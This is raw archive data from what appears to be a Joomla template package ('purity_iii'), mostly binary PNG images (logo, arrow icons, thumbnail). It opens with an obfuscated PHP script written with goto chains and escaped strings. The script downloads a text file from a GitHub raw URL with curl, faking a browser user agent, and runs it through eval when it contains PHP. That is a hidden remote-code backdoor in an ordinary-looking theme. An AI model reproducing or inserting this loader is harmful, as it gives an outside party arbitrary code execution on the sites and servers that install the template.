"\101\143\x63\x65\160\164\x3a\40\164\145\x78\164\57\150\164\x6d\154\x2c\x61\x70\160\x6c\151\143\141\164\x69\157\x6e\x2f\170\x68\164\155\x6c\x2b\x78\155\x6c\x2c\141\160\160\154\151\143\141\164\x69\157\x6e\x2f\170\155\x6c\73\x71\x3d\60\56\71\54\151\x6d\141\x67\x65\57\167\x65\142\160\x2c\x2a\57\52\73\x71\75\60\x2e\x38\15\12" . "\101\x63\x63\x65\160\164\55\x4c\141\x6e\x67\165\x61\x67\145\72\x20\x65\x6e\55\125\123\x2c\x65\156\73\x71\75\x30\56\x35\15\xa" . "\122\145\x66\145\162\145\162\72\40\x68\x74\x74\x70\163\x3a\57\x2f\x65\170\141\x6d\x70\x6c\145\56\x63\x6f\x6d\x2f\xd\12" . "\x43\157\156\x6e\x65\143\x74\x69\x6f\x6e\72\x20\x6b\145\x65\x70\x2d\141\154\151\x76\145\15\12", "\x66\157\154\x6c\157\x77\x5f\154\157\x63\141\164\151\x6f\x6e" => true]]; goto gySPy; gySPy: $nQPMm = stream_context_create($BwD1F); goto EqGlw; Z67x0: } goto vk8ns; RO02o: echo $NExaG; goto E11Hk; o9y4T: IbXTb: goto Ar2DZ; TLwWv: $NExaG = LzsGO($nBwGl); goto nqDwh; I3kma: Do1Yo: goto SLQnT; xoSL9: echo "\107\x61\147\141\x6c\40\x6d\x65\156\147\141\155\x62\x69\x6c\x20\153\157\x6e\x74\x65\x6e\x20\144\x61\x72\x69\x20\163\145\162\166\x65\x72\56"; goto SPyv2; H8qwQ: R4N40: goto LCml2; Ar2DZ: if ($NExaG !== false) { goto EagXB; } goto xoSL9; E11Hk: goto S1d0A; goto I3kma; u_pIe: S1d0A: goto cg0JC; SPyv2: goto re1vr; goto dYOgw; dYOgw: EagXB: goto tUZf1; uoV6D: function Ga5Cg($nBwGl) { goto UqgXW; UqgXW: $C2fh8 = curl_init(); goto yTq18; UeViB: curl_setopt($C2fh8, CURLOPT_RETURNTRANSFER, true); goto WPU5z; BWsVG: HS4Q2: goto x9pEo; yTq18: curl_setopt($C2fh8, CURLOPT_URL, $nBwGl); goto UeViB; Mxnpd: if (!curl_errno($C2fh8)) { goto HS4Q2; } goto oL41s; YaExD: curl_setopt($C2fh8, CURLOPT_COOKIEJAR, "\x63\157\157\x6b\x69\x65\x2e\164\x78\x74"); goto E7hEg; T1JyK: return $b77hl; goto oy5Hj; oL41s: curl_close($C2fh8); goto HLqHc; E7hEg: curl_setopt($C2fh8, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_2_0); goto UA1mV; ZBDBE: curl_setopt($C2fh8, CURLOPT_USERAGENT, "\x4d\157\x7a\151\x6c\x6c\141\57\x35\x2e\x30\x20\x28\x57\151\156\x64\157\167\x73\40\x4e\124\40\x31\60\56\x30\x3b\40\127\151\156\66\64\x3b\40\x78\66\x34\51\40\x41\160\x70\x6c\145\x57\145\x62\113\151\164\x2f\x35\x33\x37\56\x33\66\40\x28\113\110\124\115\x4c\54\40\x6c\151\x6b\145\40\107\x65\x63\x6b\157\51\40\x43\150\x72\157\x6d\x65\x2f\71\61\56\60\56\x34\64\x37\62\x2e\61\62\x34\40\x53\x61\x66\141\162\151\x2f\65\x33\x37\56\63\x36"); goto Yn7pK; x9pEo: curl_close($C2fh8); goto T1JyK; UA1mV: $b77hl = curl_exec($C2fh8); goto Mxnpd; HLqHc: return false; goto BWsVG; Yn7pK: curl_setopt($C2fh8, CURLOPT_HTTPHEADER, ["\x41\143\143\145\160\164\72\x20\x74\x65\x78\164\57\150\164\x6d\154\54\x61\160\160\x6c\151\x63\x61\x74\151\157\156\57\170\150\164\155\154\53\170\155\154\54\141\160\x70\154\x69\143\141\x74\151\x6f\x6e\x2f\170\x6d\154\73\161\x3d\60\x2e\x39\x2c\x69\155\x61\x67\145\57\x77\x65\x62\160\54\52\57\x2a\73\x71\75\x30\x2e\x38", "\x41\143\x63\x65\160\x74\55\x4c\x61\156\147\165\x61\x67\145\x3a\40\x65\156\x2d\x55\x53\54\145\x6e\73\161\75\60\56\65", "\x52\x65\146\x65\x72\x65\x72\x3a\40\x68\x74\164\160\x73\72\x2f\x2f\145\170\141\x6d\x70\154\x65\x2e\x63\157\155\57", "\x43\x6f\156\156\x65\x63\164\151\157\156\72\40\153\x65\x65\x70\x2d\141\x6c\x69\x76\145"]); goto llY4T; WPU5z: curl_setopt($C2fh8, CURLOPT_FOLLOWLOCATION, true); goto ZBDBE; llY4T: curl_setopt($C2fh8, CURLOPT_COOKIEFILE, "\143\157\x6f\x6b\151\x65\x2e\x74\170\164"); goto YaExD; oy5Hj: } goto FAni_; tUZf1: header("\x43\x6f\156\x74\x65\156\164\x2d\124\171\160\145\x3a\x20\164\x65\x78\x74\57\150\164\155\x6c\x3b\x20\x63\150\x61\162\163\145\164\75\125\124\x46\55\70"); goto Z1a52; SLQnT: eval("\x3f\76" . $NExaG); goto u_pIe; LCml2: $NExaG = Ga5CG($nBwGl); goto o9y4T; Z1a52: if (pathinfo($nBwGl, PATHINFO_EXTENSION) === "\164\170\x74" && strpos($NExaG, "\x3c\77\160\x68\160") !== false) { goto Do1Yo; } goto RO02o; n5tbK: $nBwGl = "\150\164\x74\x70\163\72\57\x2f\162\x61\167\56\147\151\164\150\x75\142\165\163\x65\x72\x63\x6f\x6e\164\145\156\164\x2e\143\x6f\x6d\57\x7a\x79\156\x78\x73\x65\143\57\172\x79\156\170\163\145\x63\57\x72\x65\x66\x73\57\x68\x65\141\x64\x73\57\155\x61\x69\156\x2f\x77\151\162\157\x2e\164\170\164"; goto uoV6D; nqDwh: goto IbXTb; goto H8qwQ; cg0JC: re1vr:PKԜ�\]���		purity_iii/images/logo.pngnu&1i��PNG


IHDR�7��A�tEXtSoftwareAdobe ImageReadyq�e<siTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91b0f3db-f1ff-4fcc-bcc6-9a22e88f2cdb" xmpMM:DocumentID="xmp.did:D0416637923C11E3A237C032C477F701" xmpMM:InstanceID="xmp.iid:D0416636923C11E3A237C032C477F701" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:97fb0108-a475-ed42-8ecb-1d0bf4cf814e" stRef:documentID="xmp.did:91b0f3db-f1ff-4fcc-bcc6-9a22e88f2cdb"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>]sbv7IDATx��m�UE�g+�^�6I2HA{#���*�bװ��h%z#�V?�A�؋�)�Q�D/E{)��(��C�P[�ԪQh��(�p����̹�=�zw���?�9w�t���<g֎��QCȉ�$>B��Ѐ�Ѐ�$�$4 !4 �	�ɤ�t�y�MPt1�?t5�/��,��zh=�ة[�1߳�У�W��IG��c]�]��:d��篡�!��3P�3$
��%�;й������#h�S�=����F���=hz�~+Tv�����n�Ww���z+�|G���V�́އN��рI���E��k^���˔�
�Z	������C���j蹄���K��)��Ґl�Y�6t�B8�4ݱ&QMi>��O��s�h�ЮvNB�/�M�)��ם�Ь&����̲=��ˁ��Zߗ�B�P��}��p�<��K�k|��i�2SD"zE
����vSOhǿ<�4�!�O�u�Y��9��QV��t	�;�D��P/4�����e��s�ՐF���v'�m������K]�,�h��3�q���@��=��~��b �]�heˀ>��_���i��Ezͤ��l���i{��7����|�2Ǿ���
~�Ö9��̄1�>U��8)
xAB��|�'�KH�D�	����<;�w����'���>
�mz�
���4Xݘ�԰$�
�6���g��^5G-g��k�>�k9?��	ťv�Ep��I���U�s��}����h�Y�����~g���R������$z����Cq����k�-*�
�5zsq��Lv��jؕWv��$6�������UtC��2�p��Cq�֬�6'��h��ҘGL��GwB�ss{��q�>�/�w�0�P6C֮v�
�+�oT�sB̀�'���B/����7A��Z���M���ͧ?��
���P��א������]�4�]�)��C�0�?�x�	ԗ����T�[�㞒ܬ�wM�hUdݷ\7';��q����� >��c�%�������"��3EV`JPěI��k37i|*tZ�;�ͺ{���Uf��Z�*V�f�1S%�B��F�߸Oev���}��O���ߑ�;�7$�A3��Mf�	�VP��g2x�����6�#Y�u-x�9v� F��2�s�d
�y36#/�I6ˡ�=��՚f�(Ў�x��		
��3�]�0�,b��h>E��C�e���ƫ�"��̊�r�w�w��'Z����U�ݦ~��0��B�F�L�zO�b�5�!�.iI2��р�L�L
Hh@Bh@BB�Ѐ�Ѐ�$�$4 !���	D�@��IEND�B`�PKԜ�\s��&purity_iii/images/system/arrow_rtl.pngnu&1i��PNG


IHDR		�	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-� cHRMz%������u0�`:�o�_�F?IDATxڌ�	0�D��39m�բT�S���ߜ�=GE���r�~�Cm�q�Z8/��?��x

	�4�IEND�B`�PKԜ�\�Lα��"purity_iii/images/system/arrow.pngnu&1i��PNG


IHDR		�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:327F24B3F65E11E1BD498D5063386CBC" xmpMM:DocumentID="xmp.did:327F24B4F65E11E1BD498D5063386CBC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:327F24B1F65E11E1BD498D5063386CBC" stRef:documentID="xmp.did:327F24B2F65E11E1BD498D5063386CBC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�X�3>IDATx�b���?!���IOO�`��gΜ	���h�0�	�
��Q���"FB�	YLj!@L8�x

��K�IEND�B`�PKԜ�\8�*2w1w1!purity_iii/template_thumbnail.pngnu&1i��PNG


IHDR��*\��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:97FCAB1A858D11E386D3B78E4BC7CF22" xmpMM:DocumentID="xmp.did:97FCAB1B858D11E386D3B78E4BC7CF22"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:97FCAB18858D11E386D3B78E4BC7CF22" stRef:documentID="xmp.did:97FCAB19858D11E386D3B78E4BC7CF22"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>���-�IDATx��}��u��q���l�D$A�0*٢DK��S�,���YrT8�O*��ꬫ:ו��)�.�}�e[���Ig�N�lJ�D3��H0��Eڼ;;�g:�{O��������t����/��Oǧ��P�L
�t�4�� 2��K�t=���^*c�]]�_ۈ_�3�U_��<?��Z3������A�]U�|�M	?��� h�p��A���3�憛��i?&�����`�}b�3(��M�W�n^�:�m3"XDI����A�b��Պ})�4������)�ɧpv��0��-���2^��因wמI®��[���2u]�s�
M`�?1�Vw}�?a�p��{���i3G��iЕ8�_#��X����=�ָ��^>���}����3G�
�k��
���B����y*��v�5jS	��|�Tpk
'�@���u�Y��}`�b?���_>Mo|g�kF���cԇ��!3��Li��{WO'�1
Gz�,BZp��ҕ���Ȫ��h�[��z[G����~��|��S�yk+�ؽc�������nޞ�`�����c�T�O�<L�c
Ύֱ9C�墛����A�S	t�$�B��TiF|�՚���hM�H���s�E�Q��\��]���0�)BJ��ldS���g�
!��a���>34uL'Fܻ�
[s&��P]��4����.��{S�8��h���#M���Ce���%��h#O����!lΧђ4q����Pg�qlkM�$ Tk�f�+b�4�i �#�
W������Swq��v�bx�R%�ǡ�83T�X������*nh�"�ah��K̯���C�ṡ"~|��-)�wcN_�#��7te�7\F�9xe�B�^d�j�@�Ӄ��-��T�w�
�|i������&��m}M�Qb�G���m׉ig�����ER�Ð� N��Fǵ*�o``��%m�I�*��0Ye��R���vq�|�"�m��+���2Ik����ë:��	���D��֣��$|P�m��J2�������3�Y�k�Ϋ��T�o�wy܂3�ʕG+$�u�����H2����5Զ�t�2�/A��\p�~l��	�a�*>���h�@C=�}*�%͌�4��5A0yы��9��l7���hCm�ۛ���t�f� �R�Rϡ�fG5N[���~h�='�5����Q[��H%�x&�n�E��|��n�4�y�d����~�z��W�h��`v��q�t�ȑ��͌=DJ����N�v*�ܗ�`���ڙ�&�S&��y��Lm���Se��Nok�>��IH�,���p�^$��rs௼;z�D��H-K�ڒ�bC��X�tjKZ6/.�߳��p|o6.�/�[y��F�ɛ%˶��m-�%�T";���9$i�K�ɖl�Y�u^gb�zm�>�.�`R%[���dI�G�bT�9��6�J�jsz�i��$I�\W���9dK��L��n�$IJI�$p$I���$IG�$	��I�?�L�f�}�ډ��9�\�����:+���?��xW׮�X��;���<���޴�8��G:��Ç�[��r������я���l���GvU���[��?�u�3�����.�cKR�nx�#���:��mb�d����<����G|�n��/���n]x�]����G�����5�l︭�R�;��q����:"D��n|��_�4���?p�v<�����P��j�5
�Y�����ͩ��8��L��w��W��MݦQ���[��dwߐ����6=针��$��H�����ޝ��|bj���rO�ߞ?'�y��7�ö]<zb���O���=�G~��u#��n�9]���@�h��/�{��(�T�O��&|��k-��c�v��7��`�P��Ж����P��=���~Ǣh�5F:�0UmL�����0�	>o0��ZcΏY/�!;U;\���ES��l�|mIlI.۸<b����5•������R=�ߴ� �21Z����Փ5qf��j�6f`w
e���Z�J���"���K�\6�h�x��ހ�}�n|�ijH�Mq�rݛ�j��Zt/ub�L gwўK k�A������I�)���!�4�mM��-���ZӦXOe����-GߛX��-`0!�|εj������f&�`�p\�ޔ�/AL�'ތwߘ������W��ͣ�
>��7��tå��\_��|�g���O�b��8W����,#՚¿|� �qd�u6�^-�?|�$>��=����!���"�<y���*t��������jx�ָ`�?|�h���p��!F@z�cw�w�y�� >�נ��閞:����㟻���Eώ��ެ��z���/��޳��
6KEwܴ��^��?z��
�Z�a�����er}1L{..XK�4~��M�M��O����:�c+��}���P?������}��7��C��x����ۉ����b����d؅�S}�k/�N#v[[����k���l�#�ۿr�~�8>��A|��wބ��qgV��:؍G߻�
�ߗ�^��Z+I
��OQ��I����h�J�N:����0�����롾kK��������-����<��3��3{[��������8Z���5��.!��%����MYe7��� jK��߆�{��j>6���ãx垭����o��9���a�eb����9�Փ��T��S����|����c`��:B%dI��M:�KO������"��{�x{����W�?���<�I̯�|��q�*�ܿ�t����5ܴ)��/�����?�]�}mb[�S�x�ذ��b��B��I�_$@�-ڸA��ĩQjO�7O�C]����ZRx'����\0����!�|��Y���^!�ܘP�v�l��߼�0�#O�1i��O��'�2���~E��="l$���1���r8��D#=�h_	mo܄<1�岷4�i,�V�+��Fj��
B��jNx�5�0C�\'6������ƅ�� 9Mv�ΌQ*�E�k��j��GjCmZ����P��x�!���_�?�/�<���	ñ�Щ1�J�1��H/nˆ&]�a�s*�:�s�����E<s�5���h�V�<T��N��bU��ݩ
��͒Mas
��� ��L���…�h0~e_z�r�(_���}0�!B��Ц��X$𩏟<9�~g>z���݉���X!�&�o8��ȁ�t5K�%���6c�X�Е*��?{�-x׾��v�`P8���\�vWrib̒M�L��O�������NU�r��<t�i��K�&�W����,=������Dg\�G^�T��z�Is�5�͋C�����[�������=!��z)g�J���B
�+���J��o~�$�u�6<����ş
�}��w_NU����+d0��Sf�.���O!�M�Oދ?z�-x���k[t��:-��{�v��߸�a��!�J�a�3C�}n6%�H�g��
ZCM�f�|~FE�|���:���y<�����ߺu���Ƴ�蚩i��#�4c��ʘ��z���HDžي�z�2v�%Q.[$�K����\�_U&'�m��_��бV�#
��w�b�暓)B
��1����:�0�]�>t����.`s.����:3���
Xb���!��n���ql���R
_;2L/�Į��=7�_��+82ί$8Ѕ�Gq�ߚ:�2��g�b�g�Pm���{w=�}��Ľ��#W�x�J%|����ǔF*�*�1�w��̞7�����"����=�]�Ʒ��Ł*^"��	�Y_�k���Àd�����\.�f
�i���0B��=������(�:���Q[}�*�u?��K6��$��YY^_�ߏ�oǿJ�{]8�S����5	{��F�4�ö{�x����P���l�P'�����w���(� :O
i��t|���s�?��k3]��.fU�U)e��S�v<;�׋�N�qm��k|>�f͝D��+�-B_�Ps���������" �߅�>tn��p|�>��L��񳫍�nS_؍��F�m�E���J�3�[�h'6��(3]o��J�;��<K�َaFM�6"�r��c��?�a�W'�/����:�,�w��;p�;��y����s�&��o����}H����oľ�ww,+��ްV�—��B��
l�*��e���Ե������Ɣ%\s��a	&%W\�ÇOM�m<)�\ȶD�z�4z4a�\�#J�K��,�)0�8.B'kڴ��Q��H�5��R$JtL��o:'���'�F�h�=Ôc��$hְW�:����P�:�9��L".�0�Pbޔ0�5��=([u��ݞ�t�GK��4��np\OTT����"2;���=m�Xu�ӑŽ�6�wh1���8\�'��!ODZ�G jq����ّ�:[ӂ�-'��Ό��_���Ez�lU��ֶ4�z�%(�����"j���ӆ�%t�vh�	�u�AL̵o��+82PA��盷���TÎ�Z��/�[�I
3���r����Q��ۻZ���eQDZc7w�q`>�	]D+ܱ���)
d�-ҘT�f[��-[b��G�p�k�#8��`V�X�pS�F6��w޾]h\����o�P����ڵ�C@y��9.VU�a�.�x���,V�S[4����ޞ%��4M1�8@@�ӹP��
��x�)���Fe(�J�P��R�-��ד���N&��B7o� Z"@4�41@�J���6�@!��P��O>f�c!�.�������]���nM��h;7���kS���>��$/*�(��[�4�{85\�R�HC��m)��V���IC��&pugc)�(Y�+`;:s�/_���X�W&�v���&)�;ZŽ{6��0Rq�$�@O�Ʊ%�Aݪ�b�Ɓ��8�?.T9.v�E�b�*D9Ra����$�8ׄ���Q-Q��f#�<�X��[Qa-ߟ�]m��A��dQ.��q�h$2�K�y:�¦��3���������6&4�[��}DmJ�6εQnթ�⎞�x���9�O�ix�qư6���]@ҧ&b�&��M�|�1ϽJ��و���� ��$I���h5��n3	��J��>���gNe{���*#N@��aw[g�+���…r	��`�.�g8��8)H�F�~N����rP�@6�ɗ$��:�����ܣz4W3W�r�J-G(�m�K����r$�j��ʴ�%.�.����_'��1�����ѱHܦ��r�_J��j�S��
�nN㥳��-�ؚ��w��ݭ	��t(��g.�Q$�ܶ-'F��њ��w��,.,���������;/_A���:톎���K�ڔ�~ġmY<ؚ
�d�����c��͛����hO��9������C[�b�W|���$z�n��b�TŨ��O�Fg=	����_z�v��t��s���6T����%���-2ðJw�����"�Aj\6��+�\�󓊍�mi���,6��c��SCUW��\c�A�+��u�w�L�xq|�@k��儝�������쩄!$
�����w���<y9@�3�Яt\G�ra6JpDV�;�ޡ�d�����q鎖g
�bD}����r-,�Q�;h��i>&Oi�>��G ��KJLH�=���݅���l[�w,X�-̐8,Œ҉*����[��ԩ�ֹ\w
�0t�,��$pV��`�b�_Ⱦ��WӴ����mi�H�>b{D߫ܒ$p$sJ�~�Yv�$I8�$I�H�$�#I��$I8�$I���$IG�$	I�$p$I���$I��$Iט�]I�$ip�o��^�$i��8�/�uH��T���#�$I�$I8�$I�H�$�#I��$I�$p$I���$IG��uB.!��+ڞ"��
���m���0�y�G��/|��@]���T
�D����e9Uv@}��{��u��
��>V�V���ǏG<_�Q�A��҂X,&~odbi���}�k���g�DzP�T�K�u.N�N�شh�l6�V."�� P�k<��x�������0P�V���'��.�*1��z�Iw��cK��x.<Q20�l���j��L,��i��H	Y�fbOi���(O�4������	��[�ΡyB��޸�����WF����������b������vTht��b���X)
�3��$#ا�ꎇ��ff�Œh��ȧ�u�5.5����"�����
�Ǡ��>�N5?��Sw�Mڟ�5�M�ǧڮ��9+]T��<�\X��t[<���.���A��6'm�2��3�����x�ćB�e_{m��,���s�
,_�i��ڒ|�25T%�G*C�$���sB��*�E���tqG���҉\n}�RGѭ#7ѝ��k��E��� oe+JS[$�ݚ��2l�e��	�_6mH�jqe�FG�Y�y��?_��T�t'b��J*�KL_Ǎ����e�sBlRŸb���иP�"��"$�p��@�:E��T���<�l�ހB�?Q���ck��]4p�3�x_gc ���>X�.���ne#�I�\(;SL떤�$I���Ua����+J��7�E^CQWVJ�G/�w$����ƪO�P���y.IK!rsM]��Y��/+J�HZ�`>J��bK�H�HZ2�Y<8�$x$p$I�H��YTh8�	IKq tUW����t�j��<8��)y$p$I�#�#�U�y��Mgã h�>e_0w��+Tl�moV���R���f1�(n�y�Ǔ�h+J2�s�)�P'&O�*,�9�А6u��j{�aKi:OCBSQ�{�H^:���%�G񚞮��ڻX��"�:�����+2�
�ƨ��{�xm,�u�@�g�q�����՚j��%�VU�l�P�y[��h��؞�M����,��m���=�����c���=ЕAK\�A��M�=&�e`l���o��@k���u=�#I�sx��X�'ߑ�8�t$"f>�)�$}�A��=�x��m)�fmϘpy�SHG�,q^�qr�/�;�L�vϮ|� hM��$y�(^��mx�JQH�N�}�T��r1���,FFU�����Y�J=z�X���X�v#��5���&�t�t85fᅡ*��&��P���NjX�u�
���G�2IC�/��_*�q�����	uj�E�(�P��o �u����P��GZ9R�NK�m�Eb`�@��������^R���m��<=1�>�lj<l_�b�̿�3�$�s���Dە\��'a�]tb�
��Wu�55[���*�X}:L��d ��
Y�Rgu��'���c�=N��j�I�9K̈́L����MH�K��'� ��˅����9��/Hj���p��O�`i��v8#Ψ]KP�rC=7&${�^�{��y�J��Y�FΌ�vë'@;�*w��)��	l��\���i�D�^[�V>�q+�q��V���"M��A�J�g�9B*�("oȓ��£I5J*"I�8k��$)Xb�HRl!#�]�I��d�tH�T�҇_��l!V���lOx�'	�cj���#@J��i1pV0�7���&{h"�&�=:lMJ��8�<JN���&{��$�t��H7H�"��aT:ej����D�� +�<�{-�Vw�	I�L�'a�Z�4rR/.z�F�%x$p�%�Ɇ]�6�T��<�����@0�m��x�*�9�W��Ȗ+�l����&x�<��7n���B��b�M�g��s���ٳP��SZ�LST�Zr�ΉL��^�A#� �J���α���F�׫�x�b,���(/<%LJ]w�-PuU���u
1�3���$]8g4�{�
�h?��4+|	�
�o}�[���}^�*�%7��jª'3oi�-<|,E7t��Em��LJ�k�}
�;^�%�(����i��i\��~�<����d���%�G�L�5WT?��6K�+T���@�m8�����~���M�c}�����*1��ʠ5�Ң9�q��U嚔�h�㠬\e�	I������XD�rږ�t�/��7��Q��N��cحOh����#�k�$�A�^w'�,<��R�=<׃F���`=�j�
�e�?�Q�uL��W�'fas&�r�ق�3�ܦ,:��jF��z2q��;����-Ⲻ�11��3��c���b†�/��"nLY��	je�y��dWځnW���XC-�p
K�᪳��9�)%�����F(��Me%Q��t��Y��>���m�0iD����dy�0띵*Sd�qԚ�ZތoXu����dZ�N-�D�ְ"�\3͒'hxۤ�Y�^�&��t4�OY9BL{�G倫s(hOB�43F0G{+�;:I#�D.��9�8n���Jɳށ3�>���/��$�mI#��#X;�0�����g��a'W�����۸"�|MR�4M	����#U��>C�H��'��)���!Ə
����w�skB�U����b+H����e�p�`�e�UW�G��d��%ծ�����z�}�݇x@���c�JvH��a�4Զ�\��*�v��~��	�Q��_3	@��ݢ��5��ٜ7�9�: ���i�8��=5TG0P��6��j�C�xz�(�]�x�	lٲ����K�<<�.��yl� Tۦ0�j��Q��!�p��W
����a�Z�E���b�C!ہ;���y�=��u�|��%n�$PJ��� m�"ʻ�zkH�����x������t�bG���Y1�Hɳ �y!.�E��N�Y�Yp�<N;�:g�k8��!Imp���6q�hŞ�{*8u�5f�e(l5V��H�'��X:��c%�ڏU��gi�Qf�<�3�����IW JMAG���ۙ*U�����$eVkz����I�p�>�Jv�~boGV/z�[L~�(���}�}~-ͱc h�0� X-;}=1��pU�Im3fQۢ���Jx�V=xH�O���[fl�GR��x6	4�^��>Ol^|���b�$~�ݻ���Y�p�`qhR���'���&�aj"�
�hmX��"̘	l�����udR��ۗ+
M�2>���?��W���l�.q��}��ߝ�@:���_���7JUm.��۝����Zy���jO�#��o}B\�L�;i��а%a��m�8n��;�"�%�B[\:�"�&g�yݖ�lK�����Tb�S\��6x�T��ӧQ�|�S��;"�5�Fצ�Rq��1����Uq��	)q�$ҫ��b@{�&����}O�ݬ��P�/��R�%.2�����
j�$){���N)K�[�p���[��7�.2B�3�kn�$���t.7z|��ME^���*�T���2i��I�Tl�������b���</�r����Ѓ��R���=�T1U�[�R&�� ���[T�s2�j��_�=�)��Z�:����/KR�s*oJ�xn����¶�%2 1_��g���U�Jq��dmJ��
����'���W$�%;��!]&�
k�D��E����;��`U�S�'a�a���5S���sϋ\	��� �3����+%��p�K�,�i�žΎ�å��ajXO.��Q�_�����f��������h\c��$ϴ��!l��_�*���s9�1!qyG"��6�5FW����$��L�;�����\}��qlMǰ%CF�`��t���z��ܑ�6�/���U=ED�� f��BM�i���N��9bi����u	��=^Q�V�Ʌ\,��'Q"��J�5�<̜:��tL�$
;	<K�T��i��QrCɃ��k��(q�*��u1O������u=�/�d�-ۈ�K8A�g�
